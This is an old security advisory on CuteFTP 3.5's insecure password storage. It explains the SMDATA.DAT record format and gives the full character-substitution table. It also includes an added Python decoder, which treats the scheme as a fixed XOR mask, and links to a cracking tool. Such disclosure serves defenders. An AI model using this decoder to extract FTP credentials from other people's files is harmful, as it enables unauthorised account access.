Vulnerability in CuteFTP's password storage
-------------------------------------------
by black-hand, November 1999 / January 2000

Intro:
------
CuteFTP stores passwords using a simple character substitution. Because the
substitution table is easily derived, stored passwords can be extracted.
Using this technique an attacker can extract usernames and passwords for
stored sites after obtaining the SMDATA.DAT file, either locally or remotely
using a trojan or other technique.

Applies to:
-----------
CuteFTP 3.5 and earlier versions

Discussion:
-----------
CuteFTP has an option of storing FTP sites for quick access at a later
stage. A site record holds all the site's information, including the
relevant IP address, username and password. This is all stored in the
SMDATA.DAT file, which can be found in the CuteFTP directory.

The password is stored in this database using a simple ASCII substitution
between plaintext and ciphertext. This substitution is the same for all user
records.

SMDATA.DAT by default is located at:

C:\Program Files\CuteFTP\SMDATA.DAT

Exploit:
--------
Opening up the SMDATA.DAT file in an editor shows every record; the user
records are stored towards the end. An example of such records taken from a
SMDATA.DAT file:

$^À^DTestftp.test.com^Duser^H©ª«^É^Ê^Ëö÷ ^B ^Ý ^U ^B ^?^?^?^?^B ^B ^B ^B ^B ^A ^B
$^À^Dtest2www.test.com^Dtest^H¸©»»¿§º¬^Yinnitial remote directory^Qinitial directory comments^B ^Ý ! ç^Cd ×zY^A^B ^B ^B ^B ^B ^Vlocal directory filter^[ remotee directory filteeeer^A ^B

The $ sign signifies a new record, and this is followed by a number of
fields which are delimited by a different ASCII character each time (you
will need a compatible viewer to see some ASCII characters).
The records are stored in this format:

$^À^DRECORD NAMEIP ADDRESS^DUSERNAME^HENCRYPTED PASSWORD^B ^Ý

For instance, from the first record you can read off this information:

RECORD NAME = Test
IP ADDRESS  = ftp.test.com
USERNAME    = user
PASSWORD    = ©ª«^É^Ê^Ëö÷

The rest of the fields are left blank or contain little or no information
(this advises the client to use default values). Note that the port number
field is blank as well.

So, by enciphering a known plaintext and analysing the result, the means of
encipherment can easily be deduced. The above example shows the password
abcABC>? enciphered; the result in the records database is ©ª«^É^Ê^Ëö÷.
From this you can deduce that a=©, b=ª and so forth (note that it is
case-sensitive). Therefore, when enciphering the following string:

ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890!@#$%^&*()`~-=\[]';,./_+|{}:"<>?

we get:

^É^Ê^Ë^Ì^Í^Î^Ï^À^Á^Â^Ã^Ä^Å^Æ^Ç^Ø^Ù^Ú^Û^Ü^Ý^Þ^ß^Ð^Ñ^Ò©ª«¬®¯ ¡¢£¤¥¦§¸¹º»¼½¾¿°±²ùúûüýþ^?ðñøé^Èëìí^Öîâàᨶåõ^Ô^Ó^Õïóäæç^×ã´³µòêôö÷

It is trivial to reverse the values from the SMDATA.DAT file and deduce the
user's password. If an intruder has network or physical access to the
SMDATA.DAT file in your CuteFTP directory, then your passwords are
compromised. The intruder will be able to extract all necessary information
from SMDATA.DAT to break into your account. The SMDATA.DAT file is typically
~17k in size, depending on the number of entries.

Program to Exploit:
-------------------
A VB-based application is available to reverse CuteFTP derived ciphertext
passwords. The TABLE.DAT file included consists of a single 188 character
line of information, consisting of firstly the plaintext characters followed
by the ciphertext. A simple substitution is made from one to the other. To
use, open up the SMDATA.DAT file, copy the password information and paste it
into the program to reveal the password.
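As an added example (my own Python, not the VB tool the advisory ships), the script below rebuilds the substitution table from the alphabet pair quoted above, renders it in the same caret notation the advisory uses, and decodes the two sample passwords from the records. It goes one step beyond the advisory: every readable table entry satisfies stored byte = plaintext byte XOR 0xC8, so the "table" is a fixed byte mask, which is exactly why it is reversible; that observation, the 0xC8 constant and all function names are mine.

```python
# Added example, not the advisory's VB tool. Observation (mine, checked
# against every readable entry of the table above): stored byte ==
# plaintext byte XOR 0xC8. That fills in the two entries the viewer
# swallowed ('e' -> 0xAD soft hyphen, 'h' -> 0xA0 no-break space).
KEY = 0xC8

# 94 printable ASCII characters (no space), as listed in the advisory;
# 2 * 94 = 188, the length of the single line in TABLE.DAT.
PLAIN = ("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
         "1234567890!@#$%^&*()`~-=\\[]';,./_+|{}:\"<>?")

def build_table() -> dict:
    """Plaintext character -> byte CuteFTP writes into SMDATA.DAT."""
    return {ch: ord(ch) ^ KEY for ch in PLAIN}

def to_caret(data: bytes) -> str:
    """Render stored bytes as the advisory's viewer shows them: controls
    and 0x80-0x9F as '^' + chr(byte + 0x40), DEL/0xFF as '^?'."""
    out = []
    for b in data:
        if b in (0x7F, 0xFF):
            out.append("^?")
        elif b < 0x20 or 0x80 <= b < 0xA0:
            out.append("^" + chr(b + 0x40))
        else:
            out.append(chr(b))  # plain Latin-1 glyph
    return "".join(out)

def from_caret(text: str) -> bytes:
    """Inverse of to_caret, for a password copied out of the viewer.
    '^?' may be 0x7F or 0xFF; only 0xFF ^ KEY ('7') is printable ASCII."""
    out, i = bytearray(), 0
    while i < len(text):
        if text[i] == "^" and i + 1 < len(text):
            out.append(0xFF if text[i + 1] == "?" else ord(text[i + 1]) - 0x40)
            i += 2
        else:
            out.append(ord(text[i]))
            i += 1
    return bytes(out)

def decode_password(stored: bytes) -> str:
    """Undo the substitution: XOR with the same mask, bytes -> text."""
    return bytes(b ^ KEY for b in stored).decode("latin-1")

def decode_from_viewer(text: str) -> str:
    """Decode a caret-notation password, e.g. '©ª«^É^Ê^Ëö÷' -> 'abcABC>?'."""
    return decode_password(from_caret(text))
```

`to_caret(bytes(build_table().values()))` reproduces the ciphertext line quoted above (plus the soft hyphen and no-break space the viewer dropped), and the second record's password decodes to "password".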
The encrypted passwords can be found between the ^H and ^B characters (ASCII
values 8 and 2 respectively). The result is placed into TABLE.DAT (open it
with a text editor).

The exploit (zipped) is downloadable at:
http://www.2600.org.au/advisories/cuteftp-1199.zip

An example of a SMDATA.DAT file can be downloaded at:
http://www.2600.org.au/advisories/smdata.dat

Note:
-----
There are several older "CuteFTP Password Crackers" available from various
internet sites. Given that source is not available for these, and the fact
that they make specific reference to "version 1.6/1.8", it is not known if
this is the same exploit.

Contact:
--------
I can be contacted on black_hand@2600.org.au
homepage at http://asio.wiretapped.net/~apis

-black-hand